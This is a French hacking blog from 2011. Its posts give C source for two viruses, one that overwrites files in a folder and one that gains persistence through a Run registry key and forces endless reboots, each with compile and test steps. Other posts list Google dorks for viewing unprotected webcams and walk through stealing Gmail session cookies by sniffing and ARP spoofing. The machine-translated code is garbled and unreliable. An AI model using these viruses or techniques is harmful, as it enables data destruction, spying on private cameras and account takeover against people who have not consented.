Overblog
Suivre ce blog Administration + Créer mon blog
1 juillet 2011 5 01 /07 /juillet /2011 17:18

Ce programme est un exemple de comment créer un virus en C. Ce programme démontre un programme simple virus qui, lors de l'exécution (Running) crée une copie de lui-même dans l'autre fichier. Ainsi, il détruit d'autres fichiers en les infectant. Mais le dossier infectés par le virus est également capable de transmettre l'infection à un autre fichier et ainsi de suite. Voici le code source du programme antivirus.

# Include 
# Include <io.h> 
# Include <dos.h> 
# Include <dir.h> 
# Include <conio.h> 
# Include <time.h>

Le virus FILE *, hôte *; 
int fait, a = 0; 
unsigned long x; 
buff char [2048]; 
struct ffblk ffblk; 
clock_t er, fin;

void main () 

st = clock (); 
clrscr (); 
done = FindFirst ("*.*",& ffblk, 0); 
while (! fait) 

virus = fopen (_argv [0], "rb"); 
host = fopen (ffblk.ff_name, "rb +"); 
if (hôte == NULL) goto next; 
x = 89088; 
printf ("% Infecter s \ n", ffblk.ff_name, a); 
while (x> 2048) 

fread (chamois, 2048,1, virus); 
fwrite (chamois, 2048,1, accueil); 
x-= 2048; 

fread (chamois, x, 1, virus); 
fwrite (chamois, x, 1, accueil); 
a + +; 
suivante: 

fcloseall (); 
done = FindNext (& ffblk); 


printf ("DONE (Total des Fichiers infectés =% d)!", a); 
fin de l'horloge = (); 
printf ("TEMPS PRIS =% f SEC \ n", 
(Fin-st) / CLK_TCK); 
getch (); 
}

COMPILATION MÉTHODE:

L'utilisation de Borland TC + + 3.0 (16 bits):

1. Chargez le programme dans le compilateur, appuyez sur Alt-F9 pour compiler

2. Appuyez sur F9 pour générer le fichier EXE (ne pas appuyer sur CTRL-F9, ce sera infecter tous les fichiers dans le répertoire CUR includin votre compilateur)

3. Notez la taille du fichier EXE généré en octets (voir PROPRIÉTÉS exe pour sa taille)

4. Modifiez la valeur de X dans le code source avec la taille noté (dans le code source ci-dessus X = 89088; le changer)

5. Une fois encore suivre les étapes 1 et 2.Now ÉTAPE le fichier EXE généré est prêt à infecter

L'utilisation de Borland C + + 5.5 (32 bits):

1. Compiler une fois, notez la longueur EXE généré fichier en octets

2. Modifiez la valeur de X dans le code source à cette longueur en octets

3. Recompiler it.The fichier EXE nouvelle est prêt à infecter

COMMENT TESTER:

1. Ouvrez le nouveau dossier vide

2. Mettez les fichiers EXE (en recherchant *. exe dans RECHERCHE & coller dans le nouveau dossier)

3. Exécutez le fichier EXE du virus là, vous verrez tous les fichiers dans le répertoire courant s'infecter.

4. Tous les fichiers infectés seront prêts à réinfecter

C'est tout.

AVERTISSEMENT: des fins éducatives seulement. NE PAS propagation ou utilisation abusive de ce code du virus


Partager cet article
Repost0
1 juillet 2011 5 01 /07 /juillet /2011 17:13

Je suppose que tous ceux qui utilisent un ordinateur pourraient avoir rencontré le virus du terme, mais avez-vous déjà interrogé sur la création d'un?

Dans ce post , je vais vous dire comment créer un virus informatique en C qui redémarre au démarrage

Vous avez besoin de compiler le code donné dans le compilateur C et à faire le vôtre.

Code source en C ::::::

# Include 
# Include <dos.h> 
# Include <dir.h>

int trouve, drive_no; buff char [128];

findroot void () 

int fait; 
struct ffblk ffblk; structure du bloc / / Fichier 
done = FindFirst ("C: \ \ windows \ \ system", & ffblk, FA_DIREC); / / pour déterminer la racine du lecteur 
if (fait == 0) 

done = FindFirst ("C: \ \ windows \ \ system \ \ sysres.exe", & ffblk, 0); / / afin de déterminer si le virus est déjà installé ou non 
if (fait == 0) 

trouve = 1; / / signifie que le système est déjà infecté 
retour; 

drive_no = 1; 
retour; 

done = FindFirst ("D: \ \ windows \ \ system", & ffblk, FA_DIREC); 
if (fait == 0) 

done = FindFirst ("D: \ \ windows \ \ system \ \ sysres.exe", & ffblk, 0); 
si 
(Fait == 0) 

trouve = 1; retour; 

drive_no = 2; 
retour; 

done = FindFirst ("E: \ \ windows \ \ system", & ffblk, FA_DIREC); 
if (fait == 0) 

done = FindFirst ("E: \ \ windows \ \ system \ \ sysres.exe", & ffblk, 0); 
if (fait == 0) 

trouve = 1; 
retour; 

drive_no = 3; 
retour; 

done = FindFirst ("F: \ \ windows \ \ system", & ffblk, FA_DIREC); 
if (fait == 0) 

done = FindFirst ("F: \ \ windows \ \ system \ \ sysres.exe", & ffblk, 0); 
if (fait == 0) 

trouve = 1; 
retour; 

drive_no = 4; 
retour; 

d'autre 
exit (0); 
}

void main () 

Auto * FILE, cible *; 
findroot (); 
if (trouve == 0) / / si le système n'est pas déjà infecté 

auto = fopen (_argv [0], "rb"); / / Le fichier virus s'ouvrir 
switch (drive_no) 

Cas 1: 
target = fopen ("C: \ \ windows \ \ system \ \ sysres.exe", "wb"); / / pour placer une copie de lui-même dans un endroit éloigné 
system ("REG ADD HKEY_CURRENT_USER \ \ Software \ \ Microsoft \ \ Windows \ \ 
CurrentVersion \ \ Run \ / v SRES \ / t REG_SZ \ / j 
C: \ \ windows \ \ system \ \ sysres.exe "); / / mettez ce fichier de registre pour Starup 
break;

case 2: 
target = fopen ("D: \ \ windows \ \ system \ \ sysres.exe", "wb"); 
system ("REG ADD HKEY_CURRENT_USER \ \ Software \ \ Microsoft \ \ Windows \ \ 
CurrentVersion \ \ Run \ / v SRES \ / t REG_SZ \ / j 
D: \ \ windows \ \ system \ \ sysres.exe "); 
break;

case 3: 
target = fopen ("E: \ \ windows \ \ system \ \ sysres.exe", "wb"); 
system ("REG ADD HKEY_CURRENT_USER \ \ Software \ \ Microsoft \ \ Windows \ \ 
CurrentVersion \ \ Run \ / v SRES \ / t REG_SZ \ / j 
E: \ \ windows \ \ system \ \ sysres.exe "); 
break;

case 4: 
target = fopen ("F: \ \ windows \ \ system \ \ sysres.exe", "wb"); 
system ("REG ADD HKEY_CURRENT_USER \ \ Software \ \ Microsoft \ \ Windows \ \ 
CurrentVersion \ \ Run \ / v SRES \ / t REG_SZ \ / j 
F: \ \ windows \ \ system \ \ sysres.exe "); 
break;

par défaut: 
exit (0); 
}

while (fread (chamois, 1,1, auto)> 0) 
fwrite (chamois, 1,1, cible); 
fcloseall (); 
}

d'autre 
system ("shutdown-r-t 0?); / / si le système est déjà infecté alors juste donner une commande pour redémarrer 
}

__________________________________________________________________

Compilation du code exécutable dans le virus de Scource.

1. Téléchargez le code source ici

2. Le fichier téléchargé sera Sysres.C

3. Pour le guide de compilation, étape par étape, consultez mon message Comment compiler des programmes C .

Tests et supprimer le virus de votre PC

Vous pouvez compiler et tester ce virus sur votre propre PC, sans aucune crainte. Pour tester, juste DoubleClick le fichier sysres.exe et redémarrez le système manuellement. Désormais, quand chaque fois que le PC est démarré et le bureau est chargé, votre PC va redémarrer automatiquement, encore et encore. 
Il ne fera aucun dommage à part automatiquement redémarrer votre système. Après l'avoir testé, vous pouvez supprimer le virus par les étapes suivantes.

1. Redémarrez votre ordinateur en mode sans échec

2. Aller

X: \ Windows \ System

(X peut être C, D, E ou F)

3.Vous trouverez un fichier en sysres.exe nom, le supprimer.

4.Tapez regedit dans exécuter. Vous goto Registre editor.Here naviguer

HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run

Là, sur le bon site, vous verrez une entrée par nom "SRES". Supprimer cette entry.That s 'it.You avez supprimé ce virus avec succès.

La logique derrière travail du virus

Si je n'explique pas la logique (algorithme) derrière le travail du virus, ce poste sera incomplète. Alors je vais vous expliquer la logique d'une manière simplifiée. Ici, je vais pas expliquer les détails techniques du programme. Si vous avez encore des doutes s'il vous plaît commentaires passer.

LOGIQUE:

1. D'abord le virus se trouve la partition racine (partition sur laquelle Windows est installé).

2. Ensuite, il déterminera si le fichier est déjà copié le virus (qui sont déjà infectés) dans X: \ Windows \ System

3. Si ce n'est pas cela il suffit de placer une copie de lui-même dans X: \ Windows \ System et fait une entrée de registre pour mettre ce fichier sur le virus de démarrage.

4. Ou bien si le virus se trouve déjà dans le répertoire X: \ Windows \ System (dossier), puis il donne juste une commande pour redémarrer l'ordinateur.

Ce processus est répété chaque fois que l'ordinateur est redémarré.

Partager cet article
Repost0
1 juillet 2011 5 01 /07 /juillet /2011 07:01

 

Sécurité du site internet est un problème majeur aujourd'hui et devrait être une priorité dans toute l'organisation ou un webmaster, maintenant une hackers jour se concentrent beaucoup d'efforts pour trouver des trous dans une toiled'application , si vous êtes propriétaire d'un site web et avoir un page rank élevé et High Traffic, puis il ya une chance que vous pourriez être une victime de ces pirates.
ya quelques années de leur existence sans recherche adéquate des outils de vulnérabilité, mais maintenant un jour il ya des tonnes d'outils disponibles à travers lequel, même un débutant peut trouver un site vulnérable et commencer à bidouiller

 Méthodes commune utilisée pour Site Web Hacking

Il ya beaucoup de méthodes qui peuvent être utilisés pour pirater un site web mais la plupart des communes les sont comme suit: 1. Injection SQL


 
2.XSS (Cross Site Scripting) 
File Inclusion 3.Remote (RFI) 
. 4 Annuaire Traversal attaque
l'inclusion de fichiers 5.Local (LFI) 
6. attaque DDOS

j'ai expliqué certaines de ces méthodes dans mon post " Les méthodes courantes de pirater un site web "

Outils couramment utilisés pour trouver un site vulnérable

Acunetix 

Acunetix est un de mes outils favoris pour trouver une respectabilité à n'importe quel webapplications Il vérifie automatiquement vos applications web pour les injections SQL , XSS & vulnérabilités web.


Télécharger Acunetix Web Security Scanner 

Nessus 

Nessus est le meilleur outil unix test vénérable et parmi les meilleures pour fonctionner sur Windows. Les principales caractéristiques de ce logiciel comprennent securitychecks fichier distant et local d'une architecture client / serveur avec une interface graphique GTK etc

Nessus Télécharger à partir du lien ci-dessous 
http://www.nessus.org/download

Retina- 

Retina est un autre outil d'évaluation vulnérabilité , il scanne tous les hôtes sur un réseau et un rapport sur ​​les vulnérabilités trouvées.

Retina Télécharger à partir du lien ci-dessous 
http://www.eeye.com/Home.aspx

Metasploit Framework 

Metasploit Le cadre est la source ouverte tests de pénétration cadre avec la plus grande base de données du monde des exploits publics et testés.

Télécharger Metasploit (Pour les utilisateurs Windows) à partir du lien ci-dessous 
http://www.metasploit.com/download/

Télécharger Metaspolit (Pour les utilisateurs de Linux ) à partir du lien ci-dessous
http://www.metasploit.com/download/ 

Partager cet article
Repost0
1 juillet 2011 5 01 /07 /juillet /2011 06:52

 


Voici la façon la plus simple de télécharger un vidéo de Youtube. Pendant la lecture du vidéosur youtube.com, copie son emplacement de la barre d'adresse comme lewww.youtube.com/watch?v=sasad7657dms2 puis ajouter «kick» le mot entre www. et youtube.com / lien ... .... Exemple: www.kickyoutube.com/watch?v=sasad7657dms2 Ça y est, sans aucun téléchargement d'autres logiciels ou d'aller à un autre site, que leur sont nombreuses, mais cette méthode est le meilleur selon au moi . Enjoy:) .

 


Partager cet article
Repost0
1 juillet 2011 5 01 /07 /juillet /2011 06:39

Récemment, j'ai écrit sur ​​l'article sur comment espionner une webcam et Hack J'ai reçu une très bonne réponse des lecteurs, mais dans cet article je vais vous montrer comment utiliser une Dork simples Google à accès non protégé webcams online.There sont des milliers de sans protection webcams disponibles en ligne, depuis de nombreuses webcams utilisent des protocoles connus pour transmettre la vidéo en direct des flux sur le web, il est souvent très facile de rechercher publiquement accessible webcams
1. Tout d'abord ouvrez votre internet navigateur et visitez Google.com

2. Recherche sur Google pour le mot-clé suivant »inurl: / view.index.shtml "



3. Suivant Choisissez une webcam et Profitez de Google Dorks 



Voici la liste des Dorks Google Peu utilisée pour ce but :


inurl: / view.shtml 
intitle: "Live View / - AXIS" | inurl: voir / view.shtml ^ 
? inurl: ViewerFrame Mode = 
inurl: ViewerFrame Mode = Refresh? 
inurl: axis-cgi/jpg 
inurl: axe-cgi / MJPG (Motion-JPEG) 
inurl: voir / indexFrame.shtml 
inurl: voir / index.shtml 
inurl: voir / view.shtml 
liveapplet 
intitle: "Live View" intitle: axe 
intitle: liveapplet 
allintitle: " Caméra réseau NetworkCamera "
intitle: axe intitle: "serveur vidéo" 
intitle: liveapplet inurl: LvAppl 
intitle: "EvoCam" inurl: "webcam.html" 
intitle: "Live Cam NetSnap-Server nourrir" 
intitle: "Live View / - AXIS" 
intitle: "Live View / - AXIS 206M " 
intitle: "Live View / - AXIS 206W" 
intitle: "Live View / - AXIS 210" 
inurl: indexFrame.shtml Axe 
inurl: "MultiCameraFrame Mode = Motion»? 
intitle: début inurl: cgistart 
intitle: "WJ-NT104 Page d'accueil " 
intext: "MOBOTIX M1" intext: "Ouvrir le menu" 
intext: "MOBOTIX M10" intext: "Ouvrir le menu" 
intext: "MOBOTIX D10" intext: "Ouvrir le menu« 
intitle: SNC-Z20 inurl: home / 
intitle: SNC-cs3 inurl: home / 
intitle: SNC-RZ30 inurl: home / 
intitle: "sony caméra réseau SNC-P1 " 
intitle: "sony caméra réseau SNC-M1 »
site:. viewnetcam.com-www.viewnetcam.com 
intitle: "Toshiba Caméra réseau "connexion de l'utilisateur
intitle: "netcam image en direct" 
intitle: "i-Catcher Console - Web Monitor"
Partager cet article
Repost0
1 juillet 2011 5 01 /07 /juillet /2011 06:13

 


 I am very happy to tell you that my book "A Beginners guide to Ethical Hacking" has just launched.I have been working on this book for past few months.I have dedicated this book completely to beginners who want to become hackers.

 


How will the information in the book affect me?

  • You will learn All Ethical hacking techniques and also you will learn to apply them in real world situation
  • You will start to think like hackers
  • Secure your computer from trojans,worms, Adwares etc
  • Amaze your friends with your newly learned tricks
  • You will be able to protect your self from future hack attacks

And Much more...

Reality about Password Hacking softwares

You might have heard about some paid password hacking softwares which claim to hack a password on entering the email account.But in reality all those softwares are fake.If you believe what they say then you are just wasting your time and money.These all softwares are fake.If there exists such a software, will there be any security on web. And all expert engineers at Google, Yahoo and other services are not mad. They are all engaged in ensuring security of their customers ie email account owners. So, no such software exists.
So stop wasting your time and money on these foolish softwares and services and learn real Ethical Hacking methods which hackers use to access email accounts.

For Download Link: http://www.mediafire.com/?18800rnari0vhdv

Partager cet article
Repost0
1 juillet 2011 5 01 /07 /juillet /2011 05:41
Eh bien, j'ai posté beaucoup d'articles sur l'hameçonnage et le keylogging , mais aujourd'hui, je voudrais jeter quelque lumière sur une méthode très utile qui les pirates utilisent pour pirater Gmail, Facebook et les autres comptes de messagerie à savoir Voler. Une des raisons pourquoi je vous écris cet article car il ya beaucoup de débutants d'avoir beaucoup d'idées fausses relatives à biscuits vol et le détournement de session, donc j'espère que ce tutoriel couvrir tous ces idées fausses et s'ils ne sont pas les plus chacun d'eux.

 


Qu'est-ce qu'un cookie?
Un cookie est un morceau de code qui est utilisé pour authentifier un utilisateur sur un site web, En d'autres termes quand jamais vous vous connectez à un site comme Facebook , Gmail, Orkut , etc de votre navigateur vous attribue un cookie qui raconte essentiellement le navigateur pour savoir comment longtemps que l'utilisateur doit être connecté elle, part d'un cookie d'authentification universel peut être utilisé pour des fins diverses, Si vous souhaitez en savoir plus sur biscuits voler gentiment jusqu'à google il.   
Qu'est-ce qu'un jeton de session?
Après une authentification est terminée, un serveur web les mains du navigateur d'un jeton de session qui est utilisé car un serveur web a besoin d'un moyen de reconnaître entre les différentes connexions, si un pirate peut capturer votre jeton de session, alors c'est un gâteau pour le pirate de pirater votre compte Gmail, Facebook ou tout autre compte .
Qu'est-ce qu'un détournement de session d'attaque?
Un détournement de session attaque est fondamentalement un acte de capture jeton de session et l'injecter dans votre propre navigateur pour gagner acess pour tenir compte des victimes.
Qu'est-ce qu'un cookie Stealer?

Un voleur de cookie est essentiellement un script utilisé pour voler les cookies d'authentification des victimes, maintenant pour un processus de biscuits à voler pour le travail du site Web ou la page Web doit être vulnérable à une attaque XSS, Ceci est l'idée fausse la plus commune et largement connu parmi les débutants.
Comment le voler processus de travail?
1. L'attaquant crée un script PHP et il uploades sur un site hébergeur.

2. L'attaquant demande alors la victime à visiter ce lien particulier qui contient le code PHP.

3. Une fois la victime, il rend visite à son / sa cookie d'authentification est enregistrée dans un fichier. txt.

4. Suivant l'attaquant utilise un cookieinjector ou un éditeur cookie, Il ya beaucoup de firefox addons, extensions Google Chrome pour faire le travail pour vous. Personnellement j'utilisev1.5.1 Cookie Manager car il est très convivial.


Vous pouvez également utiliser la barre d'outils webdeveloper pour faire le travail pour vous.
5. L'attaquant remplace son propres cookies avec les cookies victimes à la suite de laquelle la session victimes est le détournement
Pourquoi cela ne fonctionne pas sur un site Web qui n'est pas vulnérable aux attaques XSS?
C'est à cause de la politique du navigateur de même origine, et selon qu'il les navigateurs ne permettent pas l'javascripts pour acceder les cookies.
Gmail GX Cookie


A présent, je crois que je pourrais avoir effacé beaucoup d'idées fausses relatives à biscuits voler, mais tous ceux qui l'information est seulement bonne pour vous si vous essayez de le faire pratiquement, donc passons au sujet principal.
Dans Gmail, le témoin authentifie les utilisateurs est appelé un cookie GX, maintenant que nous ne pouvons pas utiliser un voleur de biscuits que maintenant nous ne savons pas toute la vulnérabilité XSS dans Gmail, donc si vous êtes sur un LAN, vous pouvez utiliser wireshark ou tout autre paquet renifleur de voler gmail biscuits non garantis GX et l'utiliser pour gagner acess.
Est-ce que ce hack toujours travailler?

Eh bien cette astuce ne fonctionne pas sur tous les comptes Gmail et que Gmail propose désormais de bout en bout https:// cryptage, qui crypte le jeton de session même si nous avons pu mettre la main sur le cookie GX c'est inutile, mais si un utilisateur a éteint de bout en bout https:// cryptage dans gmail il peut travailler pour vous.


J'espère que vous avez aimé le uptill message maintenant, je vais couvrir la méthode pour voler les cookies gmail GX et l'utiliser pour pirater des comptes Gmail dans le prochain post, alors restez branchés!.


Mise à jour: Part2 a été publié
Partager cet article
Repost0
1 juillet 2011 5 01 /07 /juillet /2011 05:37

 



Dans mon précédent post Cookie Gmail Voler Et Détournement de session Partie 1 , j'ai discuté de toutes les bases et les fondamentaux pour comprendre une Détournement de session d'attaque, si vous n'avez pas lu la partie 1, Veuillez lire la partie 1 en premier afin d'obtenir une bonne compréhension du sujet. Eh bien, après un retour énorme et la réponse des lecteurs sur le détournement de session, j'ai pensé à étendre ce sujet et d'écrire plus sur elle, Dans ce tutoriel, je vais vous expliquer quelques méthodes pour capturer les cookies Gmail Gx.

 


Gmail GX Cookie
Dans Gmail, le témoin authentifie les utilisateurs est appelé un cookie GX, maintenant que nous ne pouvons pas utiliser un voleur de biscuits car, aujourd'hui, nous ne savons pas toute la vulnérabilité XSS dans Gmail. Outils vous sera demandé 1. Caïn et Abel 2. Réseau Minner 3 . Wireshark

 


  
  
  

Comment faire pour capturer les cookies?

Maintenant il ya deux façons que vous pouvez utiliser pour capturer non garantis cookies Gmail qui dépendent du type de réseau que vous utilisez. packet sniffing  Si vous êtes sur un réseau Hub base vous pouvez utiliser reniflage de paquets, afin de capturer le trafic local.Vous pouvez utiliser n'importe quel renifleur de paquets que vous voulez capturer les cookies, mais je vous recommande d'utiliser soit wireshark ou Réseau Miner, car ils sont assez convivial. Wireshark Wireshark est mon choix recommandé si vous êtes sur un réseau en étoile base et nous sommes impatients de saisir une non garantis Gmail Gx Cookie. Voici comment vous pouvez capturer un cookie par l'intermédiaire de Gmail GX Wireshark. Étape 1 -Tout d'abord wireshark télécharger depuis le site officiel et l'installer. Étape 2 - Suivant ouverte jusqu'à wireshark cliquez sur analyser et cliquez ensuite sur les interfaces . Étape 3 -Ensuite, choisissez l'interface appropriée et cliquez sur démarrer .

















Étape 4 - Le wireshark va maintenant commencer à capturer le trafic, dans le journal ce temps à votre compte Gmail, mais assurez-vous que vous avez sélectionné " Ne pas utiliser https://"dans les paramètres Gmail.




Étape 5 - Prochain ensemble du filtre pour le haut à gauche pour  http.cookie contient "Gx",Qu'est ce filtre va faire, c'est qu'il va filtrer tout le trafic pour les cookies d'authentification gmail nommé GX. Étape 6 - Une fois que vous avez trouve la ligne appropriée de Gmail GX cookies clic droit dessus et cliquez sur Copy puis sélectionnez Octets (Texte imprimable) Étape 7 - . Maintenant vous avez réussi à capturer Gmail GX biscuits non garantis Réseau Miner Vous pouvez également utiliser mineur de réseau pour capturer, il est plus facile et plus userfreindly wireshark.











Note: Vous auriez besoin d'un Winpcap avant  de capturer le trafic  réseau soit mineur ou Wireshark.

ARP Spoofing ou l'homme dans l'attaque du milieu:

Maintenant, si vous êtes sur un réseau LAN commuté base, le reniflage ne ​​fonctionnera probablement pas pour vous que le trafic destiné pour le système particulier ne l'atteindre, donc packetsniffing devient inutile dans les réseaux de commutation basée. 1. Caïn et Abel.Caïn et Abel doit être votre seul choix si vous êtes sur le système d'exploitation Windows, vous pouvez facilement placer votre auto entre l'ordinateur et les victimes de la passerelle et de capturer tout le trafic passe par là et par conséquent le lancement réussi d'un homme au milieu attaque, après vous pouvez filtrer les informations provenant de cookies du trafic capturé. Voici une capture de trafic capturées à partir de Caïn et Abel.





2.EtterCap
Maintenant, si vous êtes sur une machine Linux, vous devriez probablement utiliser Ettercap que c'est l'un des meilleurs renifleurs que j'ai jamais joué avec, avec Ettercap vous pouvez facilement lancer un homme dans l'attaque du milieu (ARP Poisoning) et de capturer non garantis Gmail GX cookie.
Comment puis-je éviter ce genre d'attaque?
Alors amis jusqu'à maintenant que vous pourriez avoir connu l'importance d'utiliser desconnexions https:// . Afin de prévenir ce genre d'attaques toujours utiliser une connexion https:// ou une solution VPN lors de la connexion à vos comptes de messagerie.
Alors amis cette conclut la partie 2 de ma série sur biscuits voler, Dans la partie 3, nous examinerons la variété des différentes méthodes utilisées pour injecter des cookies dans notre navigateur pour accéder à votre compte.
Partager cet article
Repost0
1 juillet 2011 5 01 /07 /juillet /2011 05:36

 

Hacking ne signifie pas uniquement de défigurer un site Web ou de voler des informations confidentielles à quelqu'un, vous avez entendu tellement de fois à propos d'ordinateur de sécurité réseau ou tout simplement l'ordinateur de sécurité, mais ce que la sécurité des télécommunications ou de la sécurité à propos du réseau des télécommunications. Eh bien il ya beaucoup d'articles sur l'ordinateur de la sécurité mais cette fois je décidé d'écrire sur la sécurité du réseau de télécommunications.



Des télécommunications a un large champ et il contient différents domaines comme le réseau de fibres optiques, mobiles et de réseau sans fil et le réseau satellite, etc Nous avons considéré réseau sans fil spécialement pour le réseau GSM, GSM ou Global System for mobiles de communication est un réseau 2G, mais quand il fournit GPRS (données) du service qu'il peut appeler le réseau 2.5G.

Le réseau 1G ou AMPS a vulnérabilités tant que l'écoute du combiné et le clonage , car il a été le travail sur le domaine analogique alors que le réseau 2G fonctionne sur l'environnement numérique et utilise différentes sortes d'algorithme de chiffrement pour protéger les données. 

Il est bon de commencer par décrire l'architecture initiale du réseau GSM afin que vous puissiez comprendre facilement les trous de sécurité. Maintenant, considérons le schéma de base.  



 SIM Subscriber Identity Module HLR Home Location Register MS mobile station VLR Vistor Location Register BTS Base Transceiver Station Equipment Identity Register EIR BSC Base Station Controller AC centre d'authentification MSC mobile des services Switching Center PSTN Public Switched Telecomm réseau VLR Visitor Location Register ISDN Integrated Services Digital Network  


Tout comme un ordinateur de réseau, le réseau GSM aussi utiliser certains processus d'authentification pour permettre SIM (utilisateur) pour entrer dans le réseau, simplement supposer il ya 4 opérateurs qui fournit des services GSM et vous avez acheté une connexion de 1 prestataire de service, maintenant il ne signifie que votre téléphone portable ne peut pas détecter le signal du réseau trois autres, votre téléphone portablepeut capter le signal de 4 opérateurs, mais il ne peut se connecter au réseau de cette carte SIM appropriée parce que le réseau d'identifier son utilisateur par le SIM.

Comprendre les phénomènes d'authentification dans GSM
-il SIM (Subscriber Identity Module) est une petite carte et intelligent contiennent à la fois de programmation et d'information. SIM contient une clé de chiffrement temporaire pour le chiffrement, l'identité d'abonnés temporaires (TIMSI) et je nternationalmobile Subscriber Identity (IMSI)Il a également contenir un code PIN (Personal Identification Number) et un code PUK (PIN Unblocking Key) .

SIM stocke une clé d'authentification de 128 bits fourni par le prestataire de service, l'IMSI est unique à 15 chiffres qui a une troisième partie.
  • Mobile Code de pays (CCM)
  • Mobile code réseau (MNC)
  • Mobile (Subscriber Identity MSIN)
Maintenant que vous avez vu l'importance de l'IMSI, si vous avez un IMSI d'un autre utilisateur que vous pouvez vous identifier sur le réseau par l'identité de l'autre utilisateur (donc dangereux).
Mais ce qui est d'authentification d'un seul moyen de pirater des réseaux GSM? réponse est non.
L'interface de l'air que je veux dire l'interface Um entre le combiné et BTS sont cryptées par un algorithme A5, mais l'interface entre la BTS à BSC et la BSC au MSC est habituellement ne cryptées et utilise normalement un lien à micro-ondes ou dans les cas elle utilise un lien de fibre optique ou dépend de la zone géographique. Ainsi, le point de est que si quelqu'un sniffer sur ce lien de sorte que le GSM n'a pas défini de normes pour protéger cette sniffing, alors maintenant vous pouvez comprendre les principaux trou dans le réseau GSM.
Partager cet article
Repost0
1 juillet 2011 5 01 /07 /juillet /2011 05:25
Avec ce tutoriel, nous allons voir en détail l'installation de Backtrack 4 sur VirtualBox.
Pour réaliser ce tutoriel vous devez disposer de:
  • Une connexion internet... Bon, je considère que c'est OK, vu que vous avez échoué sur ce tuto. ;)
Pour commencer, téléchargez et installez VirtualBox si vous tournez sous Window$ ou Mac O$X, la démarche est la même qu'avec n'importe quel autre programme. Si votre OS hôte est Linux, veillez à télécharger la version correspondante à votre distribution et à ajouter votre utilisateur fétiche au groupe d'utilisateurs de VB.
Une fois l'installation réalisée avec succès, lancez Virtualbox. Aucune machine virtuelle n'est alors disponible, il s'agit maintenant d'en créer une. Ne partez pas en courant, cela reste très simple. Commencez la création par cliquer sur "Nouveau".
Cliquez sur "Suivant" et vous arrivez alors sur une fenêtre où on vous demande de nommer votre machine virtuelle et de spécifier quel type de système sera installé sur cette machine virtuelle. Choisissez donc un nom pour votre machine et définissez comme système d'exploitation "Linux" et comme version "Linux 2.6". Puis suivant.
Il va falloir ensuite définir la quantité de RAM que vous allez allouer à la machine virtuelle. Vous allez le déterminer en fonction des ressources disponibles sur votre ordinateur et des besoins de votre OS hôte. Ce paramètre est modifiable dans les propriétés de la machine virtuelle, si vous n'avez pas bien évalué le bon équilibre et que votre machine rame ou que votre OS en pâtit, il sera donc possible d'y remédier ultérieurement. Je dispose de 4Go de RAM en tout, je décide d'en dédier la moitié à ma machine virtuelle.
Après avoir cliqué sur suivant, il s'agit de créer une image de disque dur pour y installer votre BT. Vérifiez donc que l'option "Disque dur d'amorçage" est cochée et cliquez sur suivant.
Une nouvelle fenêtre s'ouvre, cliquez sur suivant. Il s'agit ici de définir le type d'image de disque dur virtuel. Une image à taille dynamique s'adaptera à vos besoins futurs alors qu'une image à taille fixe sera limitée à celle que vous lui aurez attribué. Je vous conseille de choisir une image disque à taille dynamique. Sauf si vous ne disposez déjà d'un espace limité et que vous ne désirez pas voir la machine virtuelle prendre trop de place sur votre disque physique.
Cliquez sur suivant et vous devez alors définir l'emplacement et la taille de votre disque dur virtuel. Ne touchez pas à l'emplacement. Attribuez une taille au disque dur virtuel, sachant qu'un minimum de 8Gb est requis. Pour ce tuto, je décide de laisser la valeur par défaut de 8Gb.
Cliquez sur suivant et vous débouchez alors sur le récapitulatif de la configuration de votre future disque virtuel. Cliquez sur terminer si vous en êtes satisfait pour créer le disque dur virtuel.
Vous arrivez alors au récapitulatif de la configuration de la machine virtuelle que vous avez paramétré. Si vous êtes satisfait de la configuration, cliquez sur terminer.
Votre machine virtuelle est alors prête à accueillir Backtrack. Vous avez réalisé le plus dur! Il ne reste plus qu'à installer Backtrack 4 et le tour est joué.

En bref, il s'agit de démarrer Backtrack en liveCD sur votre machine virtuelle et d'en exécuter l'installer qui se trouve sur le bureau. Munissez vous donc de votre image DVD de Backtrack, sélectionnez votre machine virtuelle et cliquez sur "Préférences".
Vous accédez alors à la configuration de votre machine virtuelle dont vous pouvez changer beaucoup de paramètres. A vous d'affiner les réglages en fonctions des performances de votre système hôte et des besoins de votre machine virtuelle, mais nous n'en sommes pas encore là. Allez dans l'onglet "Système" et paramétrez la séquence de démarrage comme suit:
Poursuivez en vous rendant dans l'onglet "Supports" et spécifiez l'emplacement de votre image DVD de Backtrack. Validez par Ok.
Il est enfin temps de lancer la machine virtuelle, ô joie! :) Pour cela, sélectionnez votre machine fraichement paramétrée et cliquez sur Lancer.
La machine boot alors sur l'image DVD. Validez la résolution d'écran proposée (1024x768) et poursuite du lancement, cela peut prendre un certain temps. Lorsque la ligne de commande apparait, le système est lancé, il ne vous reste plus qu'à taper
startx
pour lancer l'interface graphique.
Une fois l'interface graphique lancée, cliquez une fois sur le seul icône se trouvant sur le bureau "install.sh". L'installation commence.
Choisissez votre fuseau horaire, votre clavier etc et validez les paramètres par défaut. Ne craignez rien pour vos données, le formatage ne concerne que le disque dur virtuel créé précédemment. Le processus d'installation démarre, vous aurez le temps d'aller vous préparer un café et de manger un gouter, petit gourmand que vous êtes.
Lorsque l'installation est terminée arrêtez la machine virtuelle et "retirez" l'image DVD du lecteur virtuel, en suivant la méthode pour le mettre. C'est là qu'on verra si vous avez bien compris ce que vous avez fait… :)


Installation des additions invité:
Il reste une dernière étape pour pouvoir utiliser votre machine virtuelle confortablement. Il s'agit d'y installer les "additions invité". Cela vous permettra d'utiliser Backtrack en plein écran ou de ne plus avoir besoin d'utiliser la combinaison de touches pour sortir le pointeur de la zone de la machine virtuelle.
Pour ce faire, lancez la machine virtuelle et entrez pour le login:
root
et son inverse pour le mot de passe:
toor
Lancez ensuite l'interface graphique grâce à un
startx
Une fois l'interface graphique en place, dans la barre de menu générale, de VirtualBox cliquez sur "Périphériques" et "Installer les additions invité". Il ne se passe rien, c'est normal. Ouvrez un terminal.
Saisissez
cd /media/cdrom/
puis
./VBoxLinuxAdditions-x86.run
ou
./VBoxLinuxAdditions-amd64.run
si votre matériel est en 64bits.

Quand l'installation est terminée, éteignez la machine virtuelle et relancez la. Si tout s'est bien passé, vous pouvez maintenant jouir de votre installation en plein écran et avec une gestion de la souris bien plus confortable.
Partager cet article
Repost0

Présentation

  • : tunisian-hackers
